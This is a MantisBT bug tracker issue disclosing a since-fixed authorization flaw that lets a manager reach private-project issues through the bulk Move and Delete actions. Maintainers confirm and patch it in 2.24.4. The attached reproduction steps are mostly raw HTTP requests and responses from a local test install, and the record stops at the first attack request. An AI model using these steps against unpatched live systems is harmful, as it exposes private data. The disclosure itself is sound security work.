View Issue Details
ID | Project | Category | View Status | Date Submitted | Last Update |
---|---|---|---|---|---|
0027357 | mantisbt | security | public | 2020-09-26 20:29 | 2021-01-08 06:17 |
Reporter | d3vpoo1 | Assigned To | dregad | ||
Priority | immediate | Severity | major | Reproducibility | always |
Status | closed | Resolution | fixed | ||
Platform | Windows | OS | Windows | OS Version | Windows 10 |
Target Version | 2.24.4 | Fixed in Version | 2.24.4 | ||
Summary | 0027357: Attacker can leak private information via different functionality | ||||
Description | This allows the attacker to leaked the private issues belong on a private project EDIT: dregad | ||||
Steps To Reproduce | Original steps to reproduce have been moved to attached file, see 0027357:0064772. | ||||
Additional Information | I found this to be a critical exploit and need to report immediately. | ||||
Tags | No tags attached. | ||||
Your reports are so hard to follow, due to the information being drown in the full, raw HTTP requests/responses... Anyway, I'll go and try to wrap my head around this one now... |
|
Maybe a useful video, in this scenario I decide to create a new instance of Mantis everything here is by default no code modification Link : PoC
Note : Please mention me after you watch the PoC so I can delete it (I can't post here... 10MB video) |
|
The patch in ~0064617 fixes the following issue (described at the top of the Attacker Init section in the above Steps to reproduce).
The bug is confirmed, I'll prepare a slightly modified and improved patch. |
|
I'm not sure what you mean by that. I assume you're referring to the My View page boxes Assigned to Me (Unresolved) and unassigned and the temporary filters that are applied when clicking on View Issues button from there. This triggers in both cases, a GET request with a single Ticking the Select All box then picking Can you please clarify ? |
|
And by the way the vulnerability is confirmed. |
|
I believe I included this for a reason that some of functionality doesn't have |
|
@d3vpoo1 so after testing, as I understand it there are 3 distinct vulnerabilities in this report :
Let me know if I missed anything. The good news is that the fixes are quite straightforward, unlike 0027370 which gave me some trouble due to the large number of test cases. |
|
As far as I can tell, EDIT:
To clarify, I meant in PHP code. It is referenced in common.js, to implement the mechanism by which the individual issue checkboxes are (un)ticked when Select All is clicked |
|
Original steps to reproduce 27357_steps_to_reproduce.md (64,730 bytes)
### Initialize - As admin create two projects one public and a private project ### Access? What access - Go to manager (in this case he serves as the attacker) - In order to prove that we currently don't have access you can go to [http://localhost/mantisbt/mantisbt-2.24.3/manage_proj_edit_page.php?project_id=2](http://localhost/mantisbt/mantisbt-2.24.3/manage_proj_edit_page.php?project_id=2) - private project [http://localhost/mantisbt/mantisbt-2.24.3/view.php?id=1](http://localhost/mantisbt/mantisbt-2.24.3/view.php?id=1) - issue belong to a private project - It should return ``Access Denied.`` ### Initialize scenario - As admin report an issue to your the private project **Request** ``` POST /mantisbt/mantisbt-2.24.3/bug_report.php?posted=1 HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=---------------------------373865978329646363701737804542 Content-Length: 2515 Origin: http://localhost Connection: close Referer: http://localhost/mantisbt/mantisbt-2.24.3/bug_report_page.php Cookie: MANTIS_collapse_settings=|sidebar:0; MANTIS_VIEW_ALL_COOKIE=1; MANTIS_PROJECT_COOKIE=2; MANTIS_MANAGE_CONFIG_COOKIE=0%3A1%3A-2; PHPSESSID=cbhds6ef6rlv01qob6eck59mjk; MANTIS_secure_session=0; MANTIS_STRING_COOKIE=d4bc9ab210dcc813246fd03cd1c352ee0904b8196eafc0fa7a1572d1838dbaa6; MANTIS_BUG_LIST_COOKIE=1 Upgrade-Insecure-Requests: 1 -----------------------------373865978329646363701737804542 Content-Disposition: form-data; name="bug_report_token" 20200927nVFRNDA3foc7zbvDhVjrA1a8sWl3Fe_S -----------------------------373865978329646363701737804542 Content-Disposition: form-data; name="m_id" 0 -----------------------------373865978329646363701737804542 Content-Disposition: form-data; name="project_id" 2 -----------------------------373865978329646363701737804542 Content-Disposition: form-data; name="category_id" 1 -----------------------------373865978329646363701737804542 Content-Disposition: form-data; name="reproducibility" 90 -----------------------------373865978329646363701737804542 Content-Disposition: form-data; name="severity" 20 -----------------------------373865978329646363701737804542 Content-Disposition: form-data; name="priority" 20 -----------------------------373865978329646363701737804542 Content-Disposition: form-data; name="platform" -----------------------------373865978329646363701737804542 Content-Disposition: form-data; name="os" -----------------------------373865978329646363701737804542 Content-Disposition: form-data; name="os_build" -----------------------------373865978329646363701737804542 Content-Disposition: form-data; name="handler_id" 1 -----------------------------373865978329646363701737804542 Content-Disposition: form-data; name="summary" This is my private issue please dont access me -----------------------------373865978329646363701737804542 Content-Disposition: form-data; name="description" This is my private issue please dont access me -----------------------------373865978329646363701737804542 Content-Disposition: form-data; name="steps_to_reproduce" This is my private issue please dont access me -----------------------------373865978329646363701737804542 Content-Disposition: form-data; name="additional_info" This is my private issue please dont access me -----------------------------373865978329646363701737804542 Content-Disposition: form-data; name="tag_string" -----------------------------373865978329646363701737804542 Content-Disposition: form-data; name="tag_select" 0 -----------------------------373865978329646363701737804542 Content-Disposition: form-data; name="max_file_size" 5000000 -----------------------------373865978329646363701737804542 Content-Disposition: form-data; name="view_state" 10 -----------------------------373865978329646363701737804542-- ``` **Response** ``` HTTP/1.1 200 OK Date: Sat, 26 Sep 2020 23:29:50 GMT Server: Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33 X-Powered-By: PHP/7.1.33 Cache-Control: no-store, no-cache, must-revalidate Last-Modified: Sat, 26 Sep 2020 23:29:50 GMT Set-Cookie: MANTIS_collapse_settings=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ X-Content-Type-Options: nosniff Expires: Sat, 26 Sep 2020 23:29:50 GMT X-Frame-Options: DENY Content-Security-Policy: default-src 'self'; frame-ancestors 'none'; style-src 'self' 'unsafe-inline'; script-src 'self'; img-src 'self' 'self' data: Vary: Accept-Encoding Content-Length: 10556 Connection: close Content-Type: text/html; charset=UTF-8 <!DOCTYPE html> <html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8" /> <title>MantisBT</title> <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0" /> <link rel="stylesheet" type="text/css" href="http://localhost/mantisbt/mantisbt-2.24.3/css/default.css" /> <link rel="stylesheet" type="text/css" href="http://localhost/mantisbt/mantisbt-2.24.3/css/status_config.php?cache_key=dfc7ac70d13aae81b44f6900789629a8" /> <link rel="stylesheet" type="text/css" href="http://localhost/mantisbt/mantisbt-2.24.3/css/dropzone-5.5.0.min.css" /> <link rel="stylesheet" type="text/css" href="http://localhost/mantisbt/mantisbt-2.24.3/css/bootstrap-3.4.1.min.css" /> <link rel="stylesheet" type="text/css" href="http://localhost/mantisbt/mantisbt-2.24.3/css/font-awesome-4.6.3.min.css" /> <link rel="stylesheet" type="text/css" href="http://localhost/mantisbt/mantisbt-2.24.3/css/fonts.css" /> <link rel="stylesheet" type="text/css" href="http://localhost/mantisbt/mantisbt-2.24.3/css/bootstrap-datetimepicker-4.17.47.min.css" /> <link rel="stylesheet" type="text/css" href="http://localhost/mantisbt/mantisbt-2.24.3/css/ace.min.css" /> <link rel="stylesheet" type="text/css" href="http://localhost/mantisbt/mantisbt-2.24.3/css/ace-mantis.css" /> <link rel="stylesheet" type="text/css" href="http://localhost/mantisbt/mantisbt-2.24.3/css/ace-skins.min.css" /> <link rel="shortcut icon" href="/mantisbt/mantisbt-2.24.3/images/favicon.ico" type="image/x-icon" /> <link rel="search" type="application/opensearchdescription+xml" title="MantisBT: full-text search" href="http://localhost/mantisbt/mantisbt-2.24.3/browser_search_plugin.php?type=text"/> <link rel="search" type="application/opensearchdescription+xml" title="MantisBT: search by Issue Id" href="http://localhost/mantisbt/mantisbt-2.24.3/browser_search_plugin.php?type=id"/> <script type="text/javascript" src="/mantisbt/mantisbt-2.24.3/javascript_config.php?cache_key=dfc7ac70d13aae81b44f6900789629a8"></script> <script type="text/javascript" src="/mantisbt/mantisbt-2.24.3/javascript_translations.php?cache_key=38fd4ec05f3127949acd785e9a18aaab"></script> <script type="text/javascript" src="/mantisbt/mantisbt-2.24.3/js/jquery-2.2.4.min.js"></script> <script type="text/javascript" src="/mantisbt/mantisbt-2.24.3/js/dropzone-5.5.0.min.js"></script> <script type="text/javascript" src="/mantisbt/mantisbt-2.24.3/js/common.js"></script> <meta http-equiv="Refresh" content="2; URL=http://localhost/mantisbt/mantisbt-2.24.3/view.php?id=7" /> </head> <body class="skin-3"> <style> * { font-family: "Open Sans"; } h1, h2, h3, h4, h5 { font-family: "Open Sans"; } </style> <div id="navbar" class="navbar navbar-default navbar-collapse navbar-fixed-top noprint"><div id="navbar-container" class="navbar-container"><button id="menu-toggler" type="button" class="navbar-toggle menu-toggler pull-left hidden-lg hidden-md" data-target="#sidebar"><span class="sr-only">Toggle sidebar</span><span class="icon-bar"></span><span class="icon-bar"></span><span class="icon-bar"></span></button><div class="navbar-header"><a href="/mantisbt/mantisbt-2.24.3/my_view_page.php" class="navbar-brand"><span class="smaller-75"> MantisBT </span></a><button type="button" class="navbar-toggle navbar-toggle collapsed pull-right hidden-sm hidden-md hidden-lg" data-toggle="collapse" data-target=".navbar-buttons,.navbar-menu"><span class="sr-only">Toggle user menu</span><i class="ace-icon fa fa-user fa-2x white"></i> </button></div><div class="navbar-buttons navbar-header navbar-collapse collapse"><ul class="nav ace-nav"><li class="hidden-sm hidden-xs"><div class="btn-group btn-corner padding-right-8 padding-left-8"><a class="btn btn-primary btn-sm" href="bug_report_page.php"><i class="fa fa-edit"></i> Report Issue</a><a class="btn btn-primary btn-sm" href="manage_user_create_page.php"><i class="fa fa-user-plus"></i> Invite Users</a></div></li><li class="grey" id="dropdown_projects_menu"> <a data-toggle="dropdown" href="#" class="dropdown-toggle"> second project <i class="ace-icon fa fa-angle-down bigger-110"></i> </a> <ul id="projects-list" class=" dropdown-menu dropdown-menu-right dropdown-yellow dropdown-caret dropdown-close"> <li><div class="projects-searchbox"><input class="search form-control input-md" placeholder="Search" /></div></li><li class="divider"></li> <li><div class="scrollable-menu"><ul class="list dropdown-yellow no-margin"><li><a href="/mantisbt/mantisbt-2.24.3/set_project.php?project_id=0">All Projects </a></li> <li class="divider"></li> <li><a href="/mantisbt/mantisbt-2.24.3/set_project.php?project_id=1" class="project-link"> first project </a></li> <li class="active"><a href="/mantisbt/mantisbt-2.24.3/set_project.php?project_id=2" class="project-link"> second project </a></li> </ul></div></li></ul> </li> <li class="grey"><a data-toggle="dropdown" href="#" class="dropdown-toggle"><i class="ace-icon fa fa-user fa-2x white"></i> <span class="user-info">administrator</span><i class="ace-icon fa fa-angle-down"></i></a><ul class="user-menu dropdown-menu dropdown-menu-right dropdown-yellow dropdown-caret dropdown-close"><li><a href="/mantisbt/mantisbt-2.24.3/account_page.php"><i class="ace-icon fa fa-user"> </i> My Account</a></li><li><a href="http://localhost/mantisbt/mantisbt-2.24.3/issues_rss.php?username=administrator&key=R0qQ3AFTKVZMdV0vM5H-l-aYvaUBRnslcO85AABBH0L34Tbmvv2ZLGyOp5-I_MND7FKU87uq5QaZVBoeevI-&project_id=2"><i class="ace-icon fa fa-rss-square orange"> </i> RSS</a></li><li class="divider"></li><li><a href="/mantisbt/mantisbt-2.24.3/logout_page.php"><i class="ace-icon fa fa-sign-out"> </i> Logout</a></li></ul></li></ul></div></div></div><div class="main-container" id="main-container"> <div id="sidebar" class="sidebar sidebar-fixed responsive compact "><ul class="nav nav-list"><li> <a href="/mantisbt/mantisbt-2.24.3/my_view_page.php"> <i class="menu-icon fa fa-dashboard"></i> <span class="menu-text"> My View </span> </a> <b class="arrow"></b> </li> <li> <a href="/mantisbt/mantisbt-2.24.3/view_all_bug_page.php"> <i class="menu-icon fa fa-list-alt"></i> <span class="menu-text"> View Issues </span> </a> <b class="arrow"></b> </li> <li class="active"> <a href="/mantisbt/mantisbt-2.24.3/bug_report_page.php"> <i class="menu-icon fa fa-edit"></i> <span class="menu-text"> Report Issue </span> </a> <b class="arrow"></b> </li> <li> <a href="/mantisbt/mantisbt-2.24.3/changelog_page.php"> <i class="menu-icon fa fa-retweet"></i> <span class="menu-text"> Change Log </span> </a> <b class="arrow"></b> </li> <li> <a href="/mantisbt/mantisbt-2.24.3/roadmap_page.php"> <i class="menu-icon fa fa-road"></i> <span class="menu-text"> Roadmap </span> </a> <b class="arrow"></b> </li> <li> <a href="/mantisbt/mantisbt-2.24.3/summary_page.php"> <i class="menu-icon fa fa-bar-chart-o"></i> <span class="menu-text"> Summary </span> </a> <b class="arrow"></b> </li> <li> <a href="/mantisbt/mantisbt-2.24.3/manage_overview_page.php"> <i class="menu-icon fa fa-gears"></i> <span class="menu-text"> Manage </span> </a> <b class="arrow"></b> </li> </ul><div id="sidebar-btn" class="sidebar-toggle sidebar-collapse"><i data-icon2="ace-icon fa fa-angle-double-right" data-icon1="ace-icon fa fa-angle-double-left" class="ace-icon fa fa-angle-double-left"></i></div></div><div class="main-content"> <div id="breadcrumbs" class="breadcrumbs noprint"> <ul class="breadcrumb"> <li><i class="fa fa-user home-icon active"></i> <a href="/mantisbt/mantisbt-2.24.3/account_page.php">administrator</a> <span class="label hidden-xs label-default arrowed">administrator</span></li> </ul> <div class="nav-recent hidden-xs">Recently Visited: <a href="/mantisbt/mantisbt-2.24.3/view.php?id=7" title="[assigned] This is my private issue please dont access me">0000007</a>, <a href="/mantisbt/mantisbt-2.24.3/view.php?id=1" title="[new] this is my private project">0000001</a></div><div id="nav-search" class="nav-search"><form class="form-search" method="post" action="/mantisbt/mantisbt-2.24.3/jump_to_bug.php"><span class="input-icon"><input type="text" name="bug_id" autocomplete="off" class="nav-search-input" placeholder="Issue #"><i class="ace-icon fa fa-search nav-search-icon"></i></span></form></div> </div> <div class="page-content"> <div class="row"> <div class="container-fluid"><div class="col-md-12 col-xs-12"><div class="space-0"></div><div class="alert alert-success center"><p class="bold bigger-110">Operation successful.</p><br /><div class="btn-group"><a class="btn btn-primary btn-white btn-round " href="view.php?id=7">View Submitted Issue 7</a><a class="btn btn-primary btn-white btn-round " href="view_all_bug_page.php">View Issues</a></div></div></div></div> </div> </div> </div> <div class="clearfix"></div> <div class="space-20"></div> <div class="footer noprint"> <div class="footer-inner"> <div class="footer-content"> <div class="col-md-6 col-xs-12 no-padding"> <address> <strong>Powered by <a href="https://www.mantisbt.org" title="bug tracking software">MantisBT </a></strong> <br> <small>Copyright © 2000 - 2020 MantisBT Team</small><br><small>Contact <a href="mailto:webmaster@example.com" title="Contact the webmaster via e-mail.">administrator</a> for assistance</small><br> </address> </div> <div class="col-md-6 col-xs-12"> <div class="pull-right" id="powered-by-mantisbt-logo"> <a href="https://www.mantisbt.org" title="Mantis Bug Tracker: a free and open source web based bug tracking system."><img src="/mantisbt/mantisbt-2.24.3/images/mantis_logo.png" width="102" height="35" alt="Powered by Mantis Bug Tracker: a free and open source web based bug tracking system." /></a> </div> </div> </div> </div> </div> <a class="btn-scroll-up btn btn-sm btn-inverse display" id="btn-scroll-up" href="#"> <i class="ace-icon fa fa-angle-double-up icon-only bigger-110"></i> </a> </div> <script type="text/javascript" src="/mantisbt/mantisbt-2.24.3/js/bootstrap-3.4.1.min.js"></script> <script type="text/javascript" src="/mantisbt/mantisbt-2.24.3/js/moment-with-locales-2.24.0.min.js"></script> <script type="text/javascript" src="/mantisbt/mantisbt-2.24.3/js/bootstrap-datetimepicker-4.17.47.min.js"></script> <script type="text/javascript" src="/mantisbt/mantisbt-2.24.3/js/typeahead.jquery-1.3.0.min.js"></script> <script type="text/javascript" src="/mantisbt/mantisbt-2.24.3/js/list-1.5.0.min.js"></script> <script type="text/javascript" src="/mantisbt/mantisbt-2.24.3/js/ace.min.js"></script> </body> </html> ``` ### Attacker init > This is just additonal information you can disregard this issue but because of internet connection issues I notice that when the attacker visit the http://localhost/mantisbt/mantisbt-2.24.3/manage_proj_edit_page.php?project_id=<PRIVATE_PROJECT_ID> the project title can be disclose, it returns ``access denied`` but the dropdown for projects render the title of the project - There are two ways to initialize for the attacker, the attacker have old report or the attacker can report a new issue, I will just use the create a new issue **Request** ``` POST /mantisbt/mantisbt-2.24.3/bug_report.php?posted=1 HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=---------------------------427049419225960153701985913573 Content-Length: 2423 Origin: http://localhost Connection: close Referer: http://localhost/mantisbt/mantisbt-2.24.3/bug_report_page.php Cookie: MANTIS_collapse_settings=|attachment_preview_7:1|attachment_preview_7:0; MANTIS_VIEW_ALL_COOKIE=2; MANTIS_PROJECT_COOKIE=1; PHPSESSID=amqlo1b5cejja0rjrvjk8vds4j; MANTIS_secure_session=0; MANTIS_STRING_COOKIE=rEq9ipn3NCRWL2fefbubCfjZKQyRpOu_SLoBQO28Z9aopWLrHqmqMiFn7Vx_BzwE; MANTIS_BUG_LIST_COOKIE=6%2C4%2C5%2C3%2C2 Upgrade-Insecure-Requests: 1 -----------------------------427049419225960153701985913573 Content-Disposition: form-data; name="bug_report_token" 20200927Y7C9GOAmlETk2ohCgpLe0qIr2hRhYMgm -----------------------------427049419225960153701985913573 Content-Disposition: form-data; name="m_id" 0 -----------------------------427049419225960153701985913573 Content-Disposition: form-data; name="project_id" 1 -----------------------------427049419225960153701985913573 Content-Disposition: form-data; name="category_id" 1 -----------------------------427049419225960153701985913573 Content-Disposition: form-data; name="reproducibility" 10 -----------------------------427049419225960153701985913573 Content-Disposition: form-data; name="severity" 20 -----------------------------427049419225960153701985913573 Content-Disposition: form-data; name="priority" 30 -----------------------------427049419225960153701985913573 Content-Disposition: form-data; name="platform" -----------------------------427049419225960153701985913573 Content-Disposition: form-data; name="os" -----------------------------427049419225960153701985913573 Content-Disposition: form-data; name="os_build" -----------------------------427049419225960153701985913573 Content-Disposition: form-data; name="handler_id" 2 -----------------------------427049419225960153701985913573 Content-Disposition: form-data; name="summary" Hello I am the attacker -----------------------------427049419225960153701985913573 Content-Disposition: form-data; name="description" Hello I am the attacker -----------------------------427049419225960153701985913573 Content-Disposition: form-data; name="steps_to_reproduce" Hello I am the attacker -----------------------------427049419225960153701985913573 Content-Disposition: form-data; name="additional_info" Hello I am the attacker -----------------------------427049419225960153701985913573 Content-Disposition: form-data; name="tag_string" -----------------------------427049419225960153701985913573 Content-Disposition: form-data; name="tag_select" 0 -----------------------------427049419225960153701985913573 Content-Disposition: form-data; name="max_file_size" 5000000 -----------------------------427049419225960153701985913573 Content-Disposition: form-data; name="view_state" 10 -----------------------------427049419225960153701985913573-- ``` **Response** ``` HTTP/1.1 200 OK Date: Sat, 26 Sep 2020 23:34:54 GMT Server: Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33 X-Powered-By: PHP/7.1.33 Cache-Control: no-store, no-cache, must-revalidate Last-Modified: Sat, 26 Sep 2020 23:34:54 GMT Set-Cookie: MANTIS_collapse_settings=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ X-Content-Type-Options: nosniff Expires: Sat, 26 Sep 2020 23:34:54 GMT X-Frame-Options: DENY Content-Security-Policy: default-src 'self'; frame-ancestors 'none'; style-src 'self' 'unsafe-inline'; script-src 'self'; img-src 'self' 'self' data: Vary: Accept-Encoding Content-Length: 10525 Connection: close Content-Type: text/html; charset=UTF-8 <!DOCTYPE html> <html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8" /> <title>MantisBT</title> <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0" /> <link rel="stylesheet" type="text/css" href="http://localhost/mantisbt/mantisbt-2.24.3/css/default.css" /> <link rel="stylesheet" type="text/css" href="http://localhost/mantisbt/mantisbt-2.24.3/css/status_config.php?cache_key=e588734b679b1257c1e1720ce2aca5d6" /> <link rel="stylesheet" type="text/css" href="http://localhost/mantisbt/mantisbt-2.24.3/css/dropzone-5.5.0.min.css" /> <link rel="stylesheet" type="text/css" href="http://localhost/mantisbt/mantisbt-2.24.3/css/bootstrap-3.4.1.min.css" /> <link rel="stylesheet" type="text/css" href="http://localhost/mantisbt/mantisbt-2.24.3/css/font-awesome-4.6.3.min.css" /> <link rel="stylesheet" type="text/css" href="http://localhost/mantisbt/mantisbt-2.24.3/css/fonts.css" /> <link rel="stylesheet" type="text/css" href="http://localhost/mantisbt/mantisbt-2.24.3/css/bootstrap-datetimepicker-4.17.47.min.css" /> <link rel="stylesheet" type="text/css" href="http://localhost/mantisbt/mantisbt-2.24.3/css/ace.min.css" /> <link rel="stylesheet" type="text/css" href="http://localhost/mantisbt/mantisbt-2.24.3/css/ace-mantis.css" /> <link rel="stylesheet" type="text/css" href="http://localhost/mantisbt/mantisbt-2.24.3/css/ace-skins.min.css" /> <link rel="shortcut icon" href="/mantisbt/mantisbt-2.24.3/images/favicon.ico" type="image/x-icon" /> <link rel="search" type="application/opensearchdescription+xml" title="MantisBT: full-text search" href="http://localhost/mantisbt/mantisbt-2.24.3/browser_search_plugin.php?type=text"/> <link rel="search" type="application/opensearchdescription+xml" title="MantisBT: search by Issue Id" href="http://localhost/mantisbt/mantisbt-2.24.3/browser_search_plugin.php?type=id"/> <script type="text/javascript" src="/mantisbt/mantisbt-2.24.3/javascript_config.php?cache_key=e588734b679b1257c1e1720ce2aca5d6"></script> <script type="text/javascript" src="/mantisbt/mantisbt-2.24.3/javascript_translations.php?cache_key=38fd4ec05f3127949acd785e9a18aaab"></script> <script type="text/javascript" src="/mantisbt/mantisbt-2.24.3/js/jquery-2.2.4.min.js"></script> <script type="text/javascript" src="/mantisbt/mantisbt-2.24.3/js/dropzone-5.5.0.min.js"></script> <script type="text/javascript" src="/mantisbt/mantisbt-2.24.3/js/common.js"></script> <meta http-equiv="Refresh" content="2; URL=http://localhost/mantisbt/mantisbt-2.24.3/view.php?id=8" /> </head> <body class="skin-3"> <style> * { font-family: "Open Sans"; } h1, h2, h3, h4, h5 { font-family: "Open Sans"; } </style> <div id="navbar" class="navbar navbar-default navbar-collapse navbar-fixed-top noprint"><div id="navbar-container" class="navbar-container"><button id="menu-toggler" type="button" class="navbar-toggle menu-toggler pull-left hidden-lg hidden-md" data-target="#sidebar"><span class="sr-only">Toggle sidebar</span><span class="icon-bar"></span><span class="icon-bar"></span><span class="icon-bar"></span></button><div class="navbar-header"><a href="/mantisbt/mantisbt-2.24.3/my_view_page.php" class="navbar-brand"><span class="smaller-75"> MantisBT </span></a><button type="button" class="navbar-toggle navbar-toggle collapsed pull-right hidden-sm hidden-md hidden-lg" data-toggle="collapse" data-target=".navbar-buttons,.navbar-menu"><span class="sr-only">Toggle user menu</span><i class="ace-icon fa fa-user fa-2x white"></i> </button></div><div class="navbar-buttons navbar-header navbar-collapse collapse"><ul class="nav ace-nav"><li class="hidden-sm hidden-xs"><div class="btn-group btn-corner padding-right-8 padding-left-8"><a class="btn btn-primary btn-sm" href="bug_report_page.php"><i class="fa fa-edit"></i> Report Issue</a></div></li><li class="grey" id="dropdown_projects_menu"> <a data-toggle="dropdown" href="#" class="dropdown-toggle"> first project <i class="ace-icon fa fa-angle-down bigger-110"></i> </a> <ul id="projects-list" class=" dropdown-menu dropdown-menu-right dropdown-yellow dropdown-caret dropdown-close"> <li><div class="projects-searchbox"><input class="search form-control input-md" placeholder="Search" /></div></li><li class="divider"></li> <li><div class="scrollable-menu"><ul class="list dropdown-yellow no-margin"><li><a href="/mantisbt/mantisbt-2.24.3/set_project.php?project_id=0">All Projects </a></li> <li class="divider"></li> <li class="active"><a href="/mantisbt/mantisbt-2.24.3/set_project.php?project_id=1" class="project-link"> first project </a></li> </ul></div></li></ul> </li> <li class="grey"><a data-toggle="dropdown" href="#" class="dropdown-toggle"><i class="ace-icon fa fa-user fa-2x white"></i> <span class="user-info">manager</span><i class="ace-icon fa fa-angle-down"></i></a><ul class="user-menu dropdown-menu dropdown-menu-right dropdown-yellow dropdown-caret dropdown-close"><li><a href="/mantisbt/mantisbt-2.24.3/account_page.php"><i class="ace-icon fa fa-user"> </i> My Account</a></li><li><a href="http://localhost/mantisbt/mantisbt-2.24.3/issues_rss.php?username=manager&key=iLKFE3m8D11EdAtHoGxboYzcPjG11f41lnnKeXpgsf4e6v2261dcSSKrWrKg6fIjSj-E-Upq9mkaxxA22-QW&project_id=1"><i class="ace-icon fa fa-rss-square orange"> </i> RSS</a></li><li class="divider"></li><li><a href="/mantisbt/mantisbt-2.24.3/logout_page.php"><i class="ace-icon fa fa-sign-out"> </i> Logout</a></li></ul></li></ul></div></div></div><div class="main-container" id="main-container"> <div id="sidebar" class="sidebar sidebar-fixed responsive compact "><ul class="nav nav-list"><li> <a href="/mantisbt/mantisbt-2.24.3/my_view_page.php"> <i class="menu-icon fa fa-dashboard"></i> <span class="menu-text"> My View </span> </a> <b class="arrow"></b> </li> <li> <a href="/mantisbt/mantisbt-2.24.3/view_all_bug_page.php"> <i class="menu-icon fa fa-list-alt"></i> <span class="menu-text"> View Issues </span> </a> <b class="arrow"></b> </li> <li class="active"> <a href="/mantisbt/mantisbt-2.24.3/bug_report_page.php"> <i class="menu-icon fa fa-edit"></i> <span class="menu-text"> Report Issue </span> </a> <b class="arrow"></b> </li> <li> <a href="/mantisbt/mantisbt-2.24.3/changelog_page.php"> <i class="menu-icon fa fa-retweet"></i> <span class="menu-text"> Change Log </span> </a> <b class="arrow"></b> </li> <li> <a href="/mantisbt/mantisbt-2.24.3/roadmap_page.php"> <i class="menu-icon fa fa-road"></i> <span class="menu-text"> Roadmap </span> </a> <b class="arrow"></b> </li> <li> <a href="/mantisbt/mantisbt-2.24.3/summary_page.php"> <i class="menu-icon fa fa-bar-chart-o"></i> <span class="menu-text"> Summary </span> </a> <b class="arrow"></b> </li> <li> <a href="/mantisbt/mantisbt-2.24.3/manage_overview_page.php"> <i class="menu-icon fa fa-gears"></i> <span class="menu-text"> Manage </span> </a> <b class="arrow"></b> </li> </ul><div id="sidebar-btn" class="sidebar-toggle sidebar-collapse"><i data-icon2="ace-icon fa fa-angle-double-right" data-icon1="ace-icon fa fa-angle-double-left" class="ace-icon fa fa-angle-double-left"></i></div></div><div class="main-content"> <div id="breadcrumbs" class="breadcrumbs noprint"> <ul class="breadcrumb"> <li><i class="fa fa-user home-icon active"></i> <a href="/mantisbt/mantisbt-2.24.3/account_page.php">manager ( manager ) </a> <span class="label hidden-xs label-default arrowed">manager</span></li> </ul> <div class="nav-recent hidden-xs">Recently Visited: <a href="/mantisbt/mantisbt-2.24.3/view.php?id=8" title="[assigned] Hello I am the attacker">0000008</a>, <a href="/mantisbt/mantisbt-2.24.3/view.php?id=2" title="[new] THIS IS MY FIRST REPORT ON FIRST PROJECT">0000002</a>, <a href="/mantisbt/mantisbt-2.24.3/view.php?id=5" title="[new] this is my private project">0000005</a>, <a href="/mantisbt/mantisbt-2.24.3/view.php?id=3" title="[new] THIS IS MY second REPORT ON FIRST PROJECT">0000003</a></div><div id="nav-search" class="nav-search"><form class="form-search" method="post" action="/mantisbt/mantisbt-2.24.3/jump_to_bug.php"><span class="input-icon"><input type="text" name="bug_id" autocomplete="off" class="nav-search-input" placeholder="Issue #"><i class="ace-icon fa fa-search nav-search-icon"></i></span></form></div> </div> <div class="page-content"> <div class="row"> <div class="container-fluid"><div class="col-md-12 col-xs-12"><div class="space-0"></div><div class="alert alert-success center"><p class="bold bigger-110">Operation successful.</p><br /><div class="btn-group"><a class="btn btn-primary btn-white btn-round " href="view.php?id=8">View Submitted Issue 8</a><a class="btn btn-primary btn-white btn-round " href="view_all_bug_page.php">View Issues</a></div></div></div></div> </div> </div> </div> <div class="clearfix"></div> <div class="space-20"></div> <div class="footer noprint"> <div class="footer-inner"> <div class="footer-content"> <div class="col-md-6 col-xs-12 no-padding"> <address> <strong>Powered by <a href="https://www.mantisbt.org" title="bug tracking software">MantisBT </a></strong> <br> <small>Copyright © 2000 - 2020 MantisBT Team</small><br><small>Contact <a href="mailto:webmaster@example.com" title="Contact the webmaster via e-mail.">administrator</a> for assistance</small><br> </address> </div> <div class="col-md-6 col-xs-12"> <div class="pull-right" id="powered-by-mantisbt-logo"> <a href="https://www.mantisbt.org" title="Mantis Bug Tracker: a free and open source web based bug tracking system."><img src="/mantisbt/mantisbt-2.24.3/images/mantis_logo.png" width="102" height="35" alt="Powered by Mantis Bug Tracker: a free and open source web based bug tracking system." /></a> </div> </div> </div> </div> </div> <a class="btn-scroll-up btn btn-sm btn-inverse display" id="btn-scroll-up" href="#"> <i class="ace-icon fa fa-angle-double-up icon-only bigger-110"></i> </a> </div> <script type="text/javascript" src="/mantisbt/mantisbt-2.24.3/js/bootstrap-3.4.1.min.js"></script> <script type="text/javascript" src="/mantisbt/mantisbt-2.24.3/js/moment-with-locales-2.24.0.min.js"></script> <script type="text/javascript" src="/mantisbt/mantisbt-2.24.3/js/bootstrap-datetimepicker-4.17.47.min.js"></script> <script type="text/javascript" src="/mantisbt/mantisbt-2.24.3/js/typeahead.jquery-1.3.0.min.js"></script> <script type="text/javascript" src="/mantisbt/mantisbt-2.24.3/js/list-1.5.0.min.js"></script> <script type="text/javascript" src="/mantisbt/mantisbt-2.24.3/js/ace.min.js"></script> </body> </html> ``` ### Launch attack -as manager go to your issue [http://localhost/mantisbt/mantisbt-2.24.3/view.php?id=8](http://localhost/mantisbt/mantisbt-2.24.3/view.php?id=8) - 2 vulnerable function here are ``Move`` and ``Delete``, lets start with ``move`` functionality **Normal request** ``` POST /mantisbt/mantisbt-2.24.3/bug_actiongroup_page.php HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0 